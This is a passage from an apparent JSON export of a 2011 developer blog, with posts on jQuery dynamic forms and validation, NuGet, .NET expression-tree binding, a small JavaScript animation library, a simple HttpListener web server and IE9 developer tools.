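If you want to experiment with this locally before the real third-party service is wired up, you could stub out the external object yourself. This is purely a hypothetical stand-in that hands back the sample schema from earlier; the real vendor API will obviously behave differently:
var external = {
    getForm: function (id, callback) {
        // pretend the service responded with the schema from the start of the post
        callback({
            fields: [
                { type: 'text', label: 'First Name' },
                { type: 'text', label: 'Last Name' },
                { type: 'date', label: 'DOB' }
            ]
        });
    },
    submit: function (data) {
        // just log what would have been sent to the real service
        console.log('submitting', data);
    }
};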
Now let’s implement the buildForm method.\nfunction buildForm(form, fields) { var fieldset = form.find('fieldset'), ol = $('<ol></ol>'), templates = { text: $('#text-template'), date: $('#date-template') //and so on for more templates }; for(var i=0, il = fields.length; i < il; i++) { var field = fields[i], html = {}; field.index = i; //so we've got a unique ID for the field switch(field.type) { case 'text': html = templates.text .tmpl(field) .appendTo(ol); break; case 'date': html = templates.date .tmpl(field) .appendTo(ol); break; default: throw new Error('The field type "' + field.type + '" is not supported.\\r\\n' + JSON.stringify(field)); } } ol.appendTo(fieldset); } Now this is really simple code, we’re defining some variables up front which will be needed, and also some pointers to our templates (because caching jQuery selectors is a very good idea people!). Next we go through each item in the fields collection, find the right template and then apply the field to it.\nPro tip - templates aren’t just for dealing with collections, you can apply a single JavaScript object to them.\nOnce we’ve built up the full form it will then be added to the DOM. This is just for aesthetics; rather than appending each field to the DOM as you loop through, it does it in a single go. This means you can have some fun animations if you want to make the form appear, rather than a staggered approach if you were adding to the DOM as you go.\nEssentially we are done, the JSON schema has been parsed and we’ve now got a form which the users will see and be able to work with. It’s also surprisingly easy to do.\nAdding validation\nAs I mentioned in the introduction to the article the fields need to be validated as well. Depending on how you’re getting your JSON schema you may receive the validation down the pipe as part of the schema, but in this example I’m going to have all fields validated.\nOne thing to note, I’m assuming that this code is run in an ASP.NET MVC3 application, so I’ve got the unobtrusive jQuery validation also included, which has an interesting side effect: it parses all forms and tries to set up the validation rules. But sadly we don’t have the form built yet so the validation rules can’t get created!\nBecause we’ve got unobtrusive validation included and it’s already parsed our form it poses a bit of a problem, when you pass your rules into the validate method it won’t do anything. When the plugin runs it adds a data attribute to the form which contains all the rules ($('form').data('validator') is where it is).
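You can see that for yourself in the console on a page with unobtrusive validation loaded; the property names below are from the jQuery Validation plugin as described in this post, so treat it as illustrative:
// the unobtrusive plugin has already run validate() on the (still empty) form
var validator = $('form').data('validator');
console.log(validator.settings.rules); // the rules it captured when it parsed the form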
This is problematic, we can’t revalidate the form if we put unobtrusive rules on it.\nBuilding validation rules\nAlthough we may not be able to go with the unobtrusive validation it’s not a big issue IMO, we’re already being unobtrusive by running our JavaScript to build the form in a separate file (you are doing that, right…), so we can just build up the rules as we’re parsing our schema:\nfunction buildForm(form, fields) { var fieldset = form.find('fieldset'), ol = $('<ol></ol>'), templates = { text: $('#text-template'), date: $('#date-template') //and so on for more templates }, rules = {}, messages = {}; for(var i=0, il = fields.length; i < il; i++) { var field = fields[i], html = {}, id = 'field-' + i; field.index = i; rules[id] = { required: true //setup the rule for this field, we're just putting required as true }; messages[id] = { required: 'The field is required' //create a message for when the field is invalid }; switch(field.type) { case 'text': html = templates.text .tmpl(field) .appendTo(ol); break; case 'date': html = templates.date .tmpl(field) .appendTo(ol); rules[id].date = true; messages[id].date = 'That\\'s not a valid date'; break; default: throw new Error('The field type "' + field.type + '" is not supported.\\r\\n' + JSON.stringify(field)); } } ol.appendTo(fieldset); //wait, how do we add the rules? } In the above we’ve added a few new variables, one which will hold our ruleset and one which will hold the messages. Each rule is based off the name (or ID, I forget which) of the form field, so I’ve created a variable in the loop that’s the ID. You could then add this to the field object and have the template parse it rather than having duplicate code (but I’m lazy and it’s not overly exciting so I’ll skip it :P).\nNow that we have all our rules made, how do we go about adding them? As I mentioned the form has already been parsed thanks to the unobtrusive validation plugin, so when we do this:\nform.validate({ rules: rules, messages: messages }); Nothing happens…\nWell actually something useful happens, when you do call validate it’ll return the validation rules.\nRules which we can modify ;).\nThat’s right, we don’t need to “parse the form” again, we can just modify the ruleset that’s already there, so we’ll update our code:\nfunction buildForm(form, fields) { var fieldset = form.find('fieldset'), ol = $('<ol></ol>'), templates = { text: $('#text-template'), date: $('#date-template') //and so on for more templates }, validationRules = form.validate(), rules = {}, messages = {}; for(var i=0, il = fields.length; i < il; i++) { var field = fields[i], html = {}, id = 'field-' + i; field.index = i; rules[id] = { required: true //setup the rule for this field, we're just putting required as true }; messages[id] = { required: 'The field is required' //create a message for when the field is invalid }; switch(field.type) { case 'text': html = templates.text .tmpl(field) .appendTo(ol); break; case 'date': html = templates.date .tmpl(field) .appendTo(ol); rules[id].date = true; messages[id].date = 'That\\'s not a valid date'; break; default: throw new Error('The field type "' + field.type + '" is not supported.\\r\\n' + JSON.stringify(field)); } } ol.appendTo(fieldset); $.extend(validationRules.settings, { rules: rules, messages: messages }); } Up front we’ve defined another variable which will hold our existing validation information and then at the tail of the method we’re using the $.extend method to add our new rules to the existing rules.
Well, to be specific, we’re passing the validationRules.settings property, as that’s actually where the rules (and messages) reside, not on the root object.\nAlternate way to build up rules\nPart of the jQuery Validate plugin is that it adds a rules method onto jQuery objects, which means you can add rules that way. The problem I’ve found with this though is that if the input field isn’t in the DOM you can’t use the rules method, since internally it’ll look back up the DOM for the form it is attached to, but there’s no DOM to walk yet so it’ll throw an error.\nConclusion\nThis has been a fairly full-on article, we’ve looked at:\nHow to use jQuery templates to build an HTML snippet How we can parse a JSON schema for a form How to extend the existing validation rules to support new rules from the schema Hopefully this has given a bit of an insight into how to solve some crazy, way-out problems, but also how to handle some more real-world scenarios such as updating an existing form with JavaScript and then augmenting the validation rules.\n", "id": "2011-05-20-jquery-validation-and-dynamic-forms" }, { "title": "REMIX 11", "url": "https://www.aaron-powell.com/posts/2011-04-28-remix11/", "date": "Thu, 28 Apr 2011 00:00:00 +0000", "tags": [ "remix11" ], "description": "", "content": "I’m going to be speaking at REMIX11 this year, I’ll be presenting Chasing the evolving web: things you need to know to be a modern web developer.\nSo get yourself a ticket and come watch the show, REMIX is 1 - 2 June and you can register here.\n", "id": "2011-04-28-remix11" }, { "title": "It’s CodeGarden time!", "url": "https://www.aaron-powell.com/posts/2011-04-27-it-s-codegarden-time/", "date": "Wed, 27 Apr 2011 00:00:00 +0000", "tags": [ "codegarden", "umbraco" ], "description": "", "content": "Well it’s that time of year again, the time when CodeGarden is coming back!\nAs is tradition I’ll be in attendance (3rd year running) and representing a new employer (although I’m not sure if that’s such a good tradition to have upheld…).\nThis year I’ll be doing two sessions, first is on day 2 entitled Collaboration in Umbraco and I’ll be talking about how the move from TFS to Mercurial has helped Umbraco grow as well as some other practices that we employ to keep Umbraco as one of the top open source projects in the ASP.NET space. My second session will be co-presented with Alex Norcliffe and is entitled 0 to Hive in 45 where we’ll be going on a crazy journey into the depths of the Umbraco v5 API and look at how to plug in your own data model. I’m really excited about this session and hopefully we’ll be able to keep a good amount of it under wraps so that we can totally blow your mind on the day!\nOther than this you’ll find me milling around the various sessions, helping out in the hands on labs and just generally causing trouble ;), so feel free to say hi!\n", "id": "2011-04-27-it-s-codegarden-time" }, { "title": "Why do you care where your packages are?", "url": "https://www.aaron-powell.com/posts/2011-04-27-why-does-package-location-matter/", "date": "Wed, 27 Apr 2011 00:00:00 +0000", "tags": [ "nuget" ], "description": "Warning - the following is an opinionated piece and based on my experience. It doesn't reflect that of any of my employers or of any sane human beings", "content": "As a consultant I’ve had an opportunity to see the way different projects manage their external dependencies, and being an active member of open source projects has given me a good view on this as well.
From all this I’ve noticed an interesting trend, there’s no agreed standard for where to put external dependencies.\nAt previous companies I’ve worked with structures like a folder above the solution root called lib, a dll folder at the root of the solution or a common folder on the file system which every project gets its assemblies from.\nOpen source projects are much better, FunnelWeb has both a lib folder (above solution root) and the NuGet packages folder, WebForms MVP has a Dependencies folder and a NuGet one, where as Umbraco 4.7 has a foreign dlls (at solution root) and Umbraco 5 has Resources/References above the solution root.\nSo as you can see there’s not a lot of commonality between projects, and the more projects you sample the more you’ll see this trend; some overlap by generally speaking each project has its own flavor. Even Umbraco doesn’t keep it consistent between the two versions (yes this can be argued with the legacy nature of 4.x but it’s a bit of a weak excuse, they are drastically different).\nA look at other communities Over the last few months I’ve been playing around with both Ruby and Node.js and one of the first things you’ll notice when working with these technologies is that this confusion doesn’t exist.\nIt wasn’t until a few months after I started with these technologies that I actually learnt where external dependencies actually exist on your computer, and there’s a really good reason for that.\nTake Ruby for example, Ruby has had the gem tool for a long time and you use gem to download an open source library and include it into your project. Say I want to build a site using Sinatra, I run:\ngem install sinatra Now I have Sinatra on my machine (assuming I didn’t previously) and I can include it into my project. If I throw my project up on GitHub and someone else grabs it they can install the gems I required themselves (or not if they already have them). And if I’m a really proactive developer I can create a Gemfile file and they can use bundler to install all the gems I specified. But where these gems install to is not important, in fact you’re encouraged to not care by the fact that there is no feedback regarding that in gem install process.\nNoe.js has a similar story using npm, and it works in a similar manner, you install packages but dont’ concern yourself as to where they actually go on disk.\nThen there was NuGet So what we’ve seen with Ruby and Node.js is that the focus around a package management tool really helps getting around the problem of where to put your dependencies. As is often the case .NET is late to the party, but now it’s here with its shiny new tool, NuGet.\nWhen you work with NuGet you find that it has a very gem-like feel to it, when you install a NuGet package it doesn’t tell you where the file(s) end up on disk, they just end up somewhere. Well it turns out that it’s not very hard to work out where they were, they reside in a packages folder existing at the level of the solution. This is not quite as nice as the global gem or npm, it’s still including them in the scope of a particular project, but to an extent you can see why it is this way, the Visual Studio tools probably needed an easy way in which they can find somewhere that is scoped to the solution.\nFantastic, with NuGet we’ve now got one less thing that’ll be different between .NET projects (there’s still coding standard, project naming, etc to deal with :P), right… right? Well apparently not. 
While having a browse around the NuGet issue list I noticed that the top-voted NuGet issue is on this topic, that the package location should be customizable.\nThis smacks of developers not liking change. That they have always done something some way and that it should always be done that way. Don’t get me wrong, I’m not saying that the NuGet packages folder is perfect and that we should just blindly follow it, I’m just saying that it doesn’t matter; it can be in a folder at the root of the solution, in a folder in a user’s Documents folder or hard-coded into the Windows directory, it shouldn’t matter.\nConclusion\n.NET developers often get hung up on doing it their way and not being willing to change. One such hang-up is the location of external references, but it shouldn’t matter, let the package manager dictate it for you and have one less standard that you are maintaining for yourself.\n", "id": "2011-04-27-why-does-package-location-matter" }, { "title": "I can haz MVP", "url": "https://www.aaron-powell.com/posts/2011-04-03-mvp11/", "date": "Sun, 03 Apr 2011 00:00:00 +0000", "tags": [ "mvp" ], "description": "", "content": "In case you don’t follow me on twitter you may have missed the announcement over the weekend that I’ve been awarded my first Microsoft MVP award, for Internet Explorer (Development)!\nStay tuned for all things awesome web :D.\n", "id": "2011-04-03-mvp11" }, { "title": "Fun with Expression Trees and property binding", "url": "https://www.aaron-powell.com/posts/2011-03-30-binding/", "date": "Wed, 30 Mar 2011 00:00:00 +0000", "tags": [ ".net", "c#-4", "expression-tree-fun" ], "description": "", "content": "The client I’m currently working for is using an MVP pattern with WebForms (not WebFormsMVP but an internally developed one) which is using an active view pattern. What this means is that the model contains all the data for both incoming and outgoing requests.\nSay a button click happens, the form posts and the model is updated with the data of the input fields, which the presenter then takes over.\nThis results in a lot of code like this:\ntxtFirstName.Text = Model.FirstName; txtLastName.Text = Model.LastName; Or this:\nModel.FirstName = txtFirstName.Text; Model.LastName = txtLastName.Text; One of the developers here had finally got sick of typing out model binding code and decided to implement model binding like this:\nBindings.Add(new Binding { Data = () => Model.FirstName, Ui = () => txtFirstName.Text, Direction = BindingDirection.ReadWrite }); Now this is a pretty neat solution and it solved the problem for the most part. Internally it’s using Expression Trees, but it makes two very crucial assumptions: Data can only come from Model.PropertyName, meaning you can’t really work with indexers, etc, and Model.PropertyName will return a class, not a struct.\nI decided that I wanted to use it for something a bit different, I wanted to bind a boolean value to a check box. Unfortunately this doesn’t work as the boolean Expression Tree fails to meet the assumptions listed above.\nThinking that there must be another way to go about this I decided to have a bit of a play around with Expression Trees myself and came up with the following idea.\nNote - this isn’t actually the code we’re using here.
We have a .NET 3.5 application and the following code only works in .NET 4.0 due to some changes/ improvements of Expressions Trees.\nA quick note on .NET 4.0 Expression Trees If you haven’t really dug around much with Expression Trees in .NET 4.0 you may not be aware that they actually evolved a lot in the new CLR, in fact the .NET 4.0 version is not really an Expression Tree any more, it’s actually a Statement Tree and it’s scarily close to a full blow Abstract Syntax Tree (AST). Bart De Smet has two really good blogs on the topic, a look at the new Statement Trees and some ways to reduce the pain.\nBut if you’re not into reading those posts the high level view is that in .NET 4.0 you can actually produce Expressions which are more like methods. You can create IfThen statements, variable declarations, loops, etc. And that’s pretty cool in my book!\nBack to binding So back at our original experiement I wanted to work out a way I could take the data and the ui, hook them up with an expression to support two-way binding. With .NET 4.0 you can do that really bloody easy since there is an Assign expression which we can play with.\nAssign works like this:\nExpression.Assign( target, source ); This means you can do something like this:\nExpression.Assign( () => foo.Bar, Expression.Constant("bar") ); What this will do is create an expression which looks like:\nfoo.Bar = "baz"; Fantastic :D\nBut let’s step back a bit and flesh out a more complete example. First off I need to create some variables to bind:\nvar foo = new Foo(); var foo2 = new Foo {Bar = "baz"}; Now we’ll create some expressions:\nExpression<Func<string>> exp1 = () => foo.Bar; Expression<Func<string>> exp2 = () => foo2.Bar; When you start breaking apart the expression trees above what you’ll find that you have is an expression which has a body of type System.Linq.Expressions.PropertyExpression (which is an internal class!) and if you want to try and break it apart you’ll be able to find out the variable you’ve accessed the property on, as well as the property accessed.\nWhat’s cool about a PropertyExpression is that we can do things such as read or write from the property. So now we’ll create our assignment expression:\nvar binder = Expression.Assign( exp1.Body, exp2.Body ); Here we’re passing in the body of the expression (our PropertyExpression) as both the source and the target, which will result in C# like this:\nfoo.Bar = foo2.Bar; Note - you can’t really get the C#, it’s not possible as all it really can generate is IL and metadata.\nSo there you go, basic binding done. It’s time to compile and ship it!\nFirst create a lambda for us:\nvar lambda = Expression.Lambda(binder); Compile the lambda into a Delegate:\nvar func = lambda.Compile(); Execute the delegate:\nfunc.DynamicInvoke(); Console.WriteLine(foo.Bar); //baz You can then update foo2 and recall the delegate:\nfoo2.Bar = "Hello World!"; func.DynamicInvoke(); Console.WriteLine(foo.Bar); //Hello World! Conclusion This above code is actually not tied to WebForms, or any particular UI of .NET, you could use it in anything that supported the .NET 4.0 expression trees.\nKeep in mind that this is a thought expermiment and I haven’t exactly done a lot of testing of the code. All I know is that it worked in my basic tests :P. 
Since we’re using .NET 3.5 at this client I’m not able to actually put it into the framework, so I’m just leaving it here as a thought experiement.\nIf you’re interested in the full code it is here.\n", "id": "2011-03-30-binding" }, { "title": "An uninformed overview of NuGet", "url": "https://www.aaron-powell.com/posts/2011-03-28-an-uninformed-overview/", "date": "Mon, 28 Mar 2011 00:00:00 +0000", "tags": [ "nuget" ], "description": "", "content": "In case you’ve been living under a rock for the last few months you should have heard about NuGet, and if you have been here’s the abridged version.\nNuGet is a package manager for .NET projects. Basically think Ruby Gems, NPM for Node.js, etc and you’ll come up with NuGet for .NET.\nNuGet isn’t the first attempt at a unified package management system, OpenWrap was here first, but it didn’t seem to have the reach that NuGet seems to have (yes this could be because you’ve got the official Microsoft stamp of awesome, lots more Microsoft shills blogging about it, etc), but that shouldn’t be important, what’s more important is there is actually a package management story for .NET now.\nHow does NuGet work though? Well NuGet is made up of two parts, first there is the NuGet Gallery which packages are uploaded, packages can be downloaded, etc. This is data provided to connecting clients using OData (which allows cool things like querying with LINQPad). You can also create your own NuGet server using the NuGet.Server package.\nConsuming NuGet can be done a couple of ways. As mentioned above you can use an OData reader such as LINQPad. You can write your own consumer that uses the NuGet.Core package (which I covered in detail in this post) or you can use the Visual Studio 2010 tool.\nThe Visual Studio tool also include a set of Powershell scripts which mean that you can call out to NuGet from Powershell, although I’m not entirely sure how well it’d work outside of Visual Studio as it does seem to use some of the VS API to add references to a project. But the Powershell tools are cool, they allow you to do things like this.\nWhat makes up a NuGet package A NuGet package, or nupkg file, it really just a ZIP file with a manifest within it. The nuspec format is documented and can easily be implemented. The way the files are treated has also been documented and most of it is based off of conventions. Really the main two you need to know are:\n/lib files go into the project references /Content files go into the root of the project (and folder nesting is allowed) There’s also a Package Explorer tool available if you want to dig around the internals of existing packages.\nShould you care? I think that NuGet is something that is very vital to the .NET ecosystem. The lack of a unified package management system has been the bane of .NET development for a long time. Yes NuGet wasn’t the first, but does that really matter. I don’t care for the arguments that were waged when NuGet first came out. Accept that it’s here to stay and move on.\nAnd with that said I’m of the opinion that if it’s not on NuGet then it doesn’t exist. Harsh as this may seem but I’ve got better things to do than:\nFind the latest stable build Monitor a project for new versions Update my version when new releases are out Ask any Rubiest if they’d use something that wasn’t a gem and you’ll pretty much always receive a no.\nIs NuGet just for Open Source? 
This was a question asked at a developer event recently, and although it seems that most of the projects which are on NuGet are OSS I don’t see why NuGet would be confined to OSS.\nI don’t think that you could really do anything truly commercial from the official NuGet feed, but I can’t see why you couldn’t have a trial version of a library on there and as part of the install process’ T&C’s state that it’s got restrictions.\nNuGet and Mono Something that was a topic of discussion last night with Demis was “Does NuGet work on Mono?” and from the quick searching I did it would seem that there isn’t a Mono version of the “Add Library Reference” dialog that the Visual Studio tools provide. From what I read there is some limitations to running NuGet on Mono (and I’m referring to the Mono CLR) due to some CLR 4 features that NuGet uses which aren’t available on Mono yet.\nDemis argued that if Microsoft was really serious about NuGet being a way to deliver open source projects to developers then they should be ensuring that it has Mono tooling.\nI beg to differ on this point. Microsoft have done (mostly) the right things so far, the source is available, there are contribution guidelines if you want to fix issues and there is documentation on the package format. This is about as open source as you’re going to find from Microsoft these days and it’s a heck of a lot better than the Microsoft of old, but as for actually building the tools for MonoDevelop, I think that’s something they should stay away from.\nIf Microsoft was to add the support to MonoDevelop then it could be seen very much as an overbearing effort to push the platform (not that it’s not being pushed hard already :P).\nWant to know more? If you’re wanting to know more about NuGet I suggest that you keep an eye on David Ebbo and David Fowler.\n", "id": "2011-03-28-an-uninformed-overview" }, { "title": "Animating with JavaScript", "url": "https://www.aaron-powell.com/posts/2011-03-13-javascript-animation/", "date": "Sun, 13 Mar 2011 00:00:00 +0000", "tags": [ "javascript", "web" ], "description": "A look at how to make a simple JavaScript animation library", "content": "I’ve always considered the animation aspect of jQuery to be a bit of black magic (and well I still do :P) but at the same time I want to know how it works.\nRecent a client had a need for some really basic animation (changing some elements dimentions) and they aren’t using jQuery (and aren’t in a position to add it as a dependency) so I needed to work out another solution. This gave me the opportunity I’d wanted, a chance to delve into what it would take to make animation work.\nWell turns out it’s not really that complex, in fact it can be done in about 60 lines of code. Rather building suspense here is the code that I’ll be going over.\nNow that you’ve seen the full code let’s see about breaking it down.\nCreating a starting pointI’m going to use a self executing function to setup what we need, let’s create a skeleton like so:\nvar animator = (function() { return function(el, opts) { //do stuff }; })(); There’s two input arguments, an element to target and a set of options which will be the CSS properties we want to manipulate.\nWe’ll do some basic validation, ensuring there was either an element or an ID selector (no I’m not building a selector engine too :P) and ensuring that we did receive some CSS rules. 
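As a rough idea, that guard might look something like the following; the exact check and the error message are illustrative rather than lifted from the real code:
// bail out early if we weren't given anything usable to animate
if (!el || !opts || !opts.css) {
    throw new Error('animator needs an element (or an ID selector) and a css object');
}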
Then a type check is done against el to see if it was a DOM element or a selector (and yeah it’s pretty basic), but the ultimate goal is to get a single DOM element which we can work against.\nNext let’s set up some variables we’ll need:\nvar start = +new Date, duration = opts.duration || 600, end = start + duration, calc = el.currentStyle || getComputedStyle(el, null), style = buildStyles(opts.css), data = {}; Here’s a trick, you can do +new Date to grab the ticks right now ;).\nWe’re grabbing a few values such as the start and end time periods, the duration for an animation (or a default of 600 milliseconds), the styles of the element (using currentStyle or getComputedStyle depending on whether you’re in a current generation browser or not). The current styles are going to be important when we get to the actual animation stage. The property (or method) returns an array which contains all the CSS rules applied to the element. Why do we need this? Well when we’re doing the animation we need to know how far we have to ’travel’. If, say, you’re going from padding-top:10px to padding-top:30px we don’t want to cover 30px in total, just 20px, and if we know the starting point then we won’t break the existing UI.\nNext we’re going to build up the styles. For this we’re going to jump out to a method to handle that.\nBuilding the style rules\nFirst we need a list of CSS properties which we’ll support:\nvar supported = ('padding-top,padding-bottom,padding-left,padding-right,font-size,line-height,margin-top,margin-bottom,' + 'margin-left,margin-right,border-top,border-bottom,border-left,border-right,width,height').split(','); This I’m doing as a comma-separated string which is then split (I just find it more readable) and as you can see it just supports dimension-based manipulation.\nWe’ll next build up a string which represents the full style rule set that we’re wanting to create:\nvar buildStyles = function (style) { var s = ''; for (var x in style) { s += ' ' + x + ':' + (typeof style[x] == 'function' ? style[x]() : style[x]) + ';'; } As you can see here we’re also supporting functions for the style rules, it allows you to create funky rules based on calculations too :D. Basically it will take this:\n{ css: { 'font-size': '30px', 'padding-top': '10px' } } And produce this:\nfont-size:30px; padding-top:10px; Next we need to get tricky and filter out the rules which are not supported by our little library:\nvar el = document.createElement('div'); el.innerHTML = '<div style="' + s + '"></div>'; var res = {}; for (var i = 0, l = supported.length; i < l; i++) { if ((x = el.firstChild.style[supported[i]])) { res[supported[i]] = parse(x); } } return res; Here we’re producing a DOM element, then adding a child with the full rule set that was requested. We’ll then go through all the supported rules, see if it was specified and then build up an object to return which has the rule set we desire.
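To make that filtering a bit more concrete, here’s roughly what a call would hand back, with illustrative values (color is dropped because it isn’t in the supported list, and the px suffix is stripped so we can do maths on the numbers):
buildStyles({ 'font-size': '30px', 'color': 'red', 'padding-top': '10px' });
// => { 'font-size': 30, 'padding-top': 10 }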
We’ve also got a little parse method here which uses float parsing and regex to turn 30px into 30, which we can calculate against.\nThat completes our building of the styles and now we can go back to the core method.\nHandling the styles\nNow that we’ve got the styles that we need to animate we have to make a clone of the style rules but set the values to that of the DOM element we’re animating:\nfor (var p in style) { data[p] = parse(calc[p]); } This is going back to the currentStyle (or getComputedStyle) object we found earlier.\nMaking it animate\nSo that sees all the boilerplate code out of the way. We’ve:\nGot our start, end and duration Know what styles we originally had Know what styles we need to get to Well let’s actually make it work!\nFor this I’m going to use a recursive setTimeout pattern (which I covered in more detail here).\nThis is the code that we’re going to need:\nsetTimeout(function go() { var now = +new Date, pos = now > end ? 1 : (now - start) / duration; if (now >= end) { return; } for (var p in style) { el.style[p] = (data[p] + (style[p] - data[p]) * ((-Math.cos(pos * Math.PI) / 2) + 0.5)) + 'px'; } setTimeout(go, 10); }, 10); Now let’s break it down. We’re grabbing the current ticks and working out just how much more ground there is to cover.\nBut first off we need to check if we’ve hit the time period to do the animation in, and if so, just exit out of the timeout.\nIf we are to keep going though we’ll get a bit crazy. So we’ll iterate through all the properties in the style settings we have been told to animate. But this is the crazy part:\n(data[p] + (style[p] - data[p]) * ((-Math.cos(pos * Math.PI) / 2) + 0.5)) I don’t recall where I got this code from but I believe it was from within the jQuery source somewhere. Basically it’s some funky maths to determine a stable incrementation value based on the time remaining for the animation. And this is the most important part, you want to be able to animate at a consistent rate across the duration of the animation. By using the pos (which is defined earlier in the method) we can accurately work out the distance each animation step has to cover.\nOnce all style properties have been processed a timeout of 10 milliseconds is placed to re-execute the animation loop.\nConclusion\nTo wrap up, we’ve looked at a way to make a really small and simple animation library.
This is not a replacement for jQuery (or any other animation library) but just a good chance to shed some light on how something a little bit black magic works.\nThere’s plenty of things missing from this implementation, such as:\nusing CSS3 animations supporting animation chaining (eg: animate('h1', { css: {'padding-top':'30px'} }); animate('h1', { css: {'padding-top': '10px'} });) notification of animiation completing (aka $.Deferred) But hopefully it does give you some interesting things to think about and if you want to have a play I’ve put a jsfiddle up for it.\n", "id": "2011-03-13-javascript-animation" }, { "title": "ServerHere - When you just need a webserver", "url": "https://www.aaron-powell.com/posts/2011-03-08-serverhere/", "date": "Tue, 08 Mar 2011 00:00:00 +0000", "tags": [ "web" ], "description": "A tool for when you just want to server some files.", "content": "I’ve been doing a lot of JavaScript development recently and as cool as jsfiddle there’s a few things that really irk me about it (which is a topic for another day) and sometimes you just want to run the file locally to see how it goes.\nSo you go and create a HTML and JavaScript file on your file system and you open it in your browser and you have that crazy file system path in your address bar. Most browsers this is fine for, but IE likes to try and be a bit more secure so I’ll often see this:\nSure you can change IE’s security settings to be a little less aggressive and not give you that warning but I quite like that my browser is trying to be a bit secure, I don’t see why that’s such a bad thing.\nBut it can be a pain, if you don’t accept the security warning your JavaScript doesn’t work.\nThere’s several ways I could go about solving this problem, I could use Visual Studio and IIS Express (or Cassini if you’re old-school :P), I could map my local IIS install to that folder or I could write my own web server.\nGuess what I did!\nServerHereIf you guessed that I wrote my own web server then you guessed right. I’ve created a little project called ServerHere which does exactly what the name implies, creates a web server from the current folder.\nIt’s a commandline tool and you use it just like this:\nPS> cd c:\\SomeFolderToServe PS> c:\\Path\\To\\ServerHere.exe And there you go now you’ll have a server running at http://+:8080 (meaning localhost and machine name will work).\nIf you want to change the port it runs on you’ll need to run it as an administrator and then run it like this:\nPS> c:\\Path\\To\\ServerHere.exe /p:1234 Now it’ll run on port 1234 rather than 8080 (or 6590 which is the default administrator port, just to avoid potential conflicts).\nHow do it workThere’s a nifty little class in the .NET framework called HttpListener and this is the core of building your own web server. Basically it’s a little class for handling the HTTP protocol.\nTo use it you need to create a new instance of the class and then specify some prefixes:\nvar listener = new HttpListener(); listener.Prefixes.Add("http://localhost:8080/"); listener.Start(); Now you have a server running and listening on port 8080, via localhost. You can specify what ever hostname you want, or port number (but keep in mind that if you want to run a non-standard port you need to run as an administrator).\nTo actually handle the requests you can do it synchronously or asynchronously, obviously depending what’s best for your scenario. 
ServerHere listens asynchronously so I’ll cover that off (if you’re interested in synchronous usage, check the MSDN docs).\nFirst off we’ll create our web server class:\npublic class HttpServer { private readonly HttpListener _listener; public HttpServer() { _listener = new HttpListener(); _listener.Prefixes.Add("http://localhost:8080/"); _listener.Start(); _listener.BeginGetContext(HandleResponse, null); } private void HandleResponse(IAsyncResult result) { ... } } What we’re using here is the BeginGetContext method, which will then deal with an async request. When the Context (which is basically a HttpContext) is ready (i.e. someone has requested a URL) you can handle it, write to it, etc:\nprivate void HandleResponse(IAsyncResult result) { HttpListenerContext context; try { context = _listener.EndGetContext(result); _listener.BeginGetContext(HandleResponse, null); } catch (HttpListenerException) { return; } using (var response = context.Response) { response.StatusCode = 200; response.ContentType = "text/plain"; using (var writer = new StreamWriter(response.OutputStream)) { writer.Write("Hello World!"); writer.Flush(); } response.Close(); } } This method will do the following:\nGrab the context from the listener (you want to catch the HttpListenerException which will be thrown if the server is shutting down) Keep the server alive by re-issuing a BeginGetContext Get the response from the context Set a status code Set a content type Write something to the response I’ll leave it as an exercise to the reader to work out how to react to different URLs, return more useful responses, etc.\nConclusion\nTo wrap up we’ve seen a handy little tool for a scenario that you’ll probably never come across.\nWe then looked at the basics for creating your own web server.\nNow go, grab the source and create web servers to your heart’s content!\n", "id": "2011-03-08-serverhere" }, { "title": "Making the Internet Explorer JavaScript tools better", "url": "https://www.aaron-powell.com/posts/2011-03-02-ie9-console-thoughts/", "date": "Wed, 02 Mar 2011 00:00:00 +0000", "tags": [ "ie9", "javascript", "web", "web-dev" ], "description": "Some thoughts on how to improve the IE9 JavaScript developer tools", "content": "Previously I’ve blogged about a limitation of console.assert from the IE9 developer tools. Also recently Tatham Oddie blogged some overall thoughts on improving IE9 for developers and I decided to elaborate on some thoughts I’ve got around the JavaScript developer tools.\nJavaScript developer tools are a very important part of my toolbox, I really am quite a JavaScript fan (as you may know if you read my blog), so when I find something that irks me it really irks me.\nObject inspection\nWhen you want to inspect an object in dev tools my first thought is to dump it into the console. While the object will dump out, it’s not great: if you have nested objects they’ll produce the nice [object Object], and you also can’t expand/collapse the object like in other browsers. If you want to do that you need to put it into the Watch window.
This multi-step process is a bit tedious, particularly if you’re prototyping something like jQuery selectors or defining objects on the fly.\nCode completion\nThis is something that I’ve noticed in recent versions of Firebug and the Chrome developer tools and it’s really handy, being able to use intellisence on a JavaScript object.\nConsole clearing\nThere doesn’t seem to be a way to clear the console other than calling console.clear().\nLocals & Call Stack outside of debugging\nI’m not quite sure when you’d use those tabs on the Script window when you’re not in a debugging session.\nNo cross-tab interaction\nWith Chrome and Firebug when you drop a DOM object in the console and you hover over it the element reacts on the browser. This is really useful, especially when working with something like jQuery.\njQuery inspection\nA jQuery selector will return an array, but it’s also an object literal, meaning it’s been augmented with a number of non-array properties. That stuff isn’t what you’re interested in, you just want the selector results. I’d much prefer that it is treated as just an array and the extended properties are ignored.\nWrapping upMostly what I’ve outlined here is nit-picking on the developer tools, they are better than the previous versions and here’s hoping they take some inspiration from the other browsers.\n", "id": "2011-03-02-ie9-console-thoughts" }, { "title": "How to install a package into all projects of a solution", "url": "https://www.aaron-powell.com/posts/2011-02-26-global-install-package/", "date": "Sat, 26 Feb 2011 00:00:00 +0000", "tags": [ "nuget" ], "description": "", "content": "This is a script that I’ve been keeping in my toolbox since NuGet was first released.\nEver now and then I need to do an install of a package across all projects in a solution. log4net is an example of the kind of thing you’d want to globally install, so is Autofac.\nWell here’s a script to run from the Package Management Console:\nGet-Project -All | Install-Package packageName This is also available as a gist.\nNote: replace packageName with what you want to install ;).\nChallenge to the reader\n*Update: With a tip-off from David Fowler you can compress the script even more. If you want to see the original just check out the gist history.\nInstalling into a project subsetSince this is just a powershell script you can also apply filters, so if you have say multiple test projects you do run this:\nGet-Project -All | where { $_.Name.EndsWith(".Test") } | Install-Package NSubstitute Woot!\n", "id": "2011-02-26-global-install-package" }, { "title": "A look at browser storage options", "url": "https://www.aaron-powell.com/posts/2011-02-25-in-browser-storage/", "date": "Fri, 25 Feb 2011 00:00:00 +0000", "tags": [ "javascript", "ie9", "html5", "web", "web-dev" ], "description": "Looking at localStorage, sessionStorage and the like", "content": "Recently I created a little website, Doin’ Nothin’ which has a mostly JavaScript application. This is all well and good, means you don’t have any worries about submitting server data (unless you are registered and you want to save sessions). But it has a problem, because it’s all JavaScript I kept having a problem, I’d forget to log in before 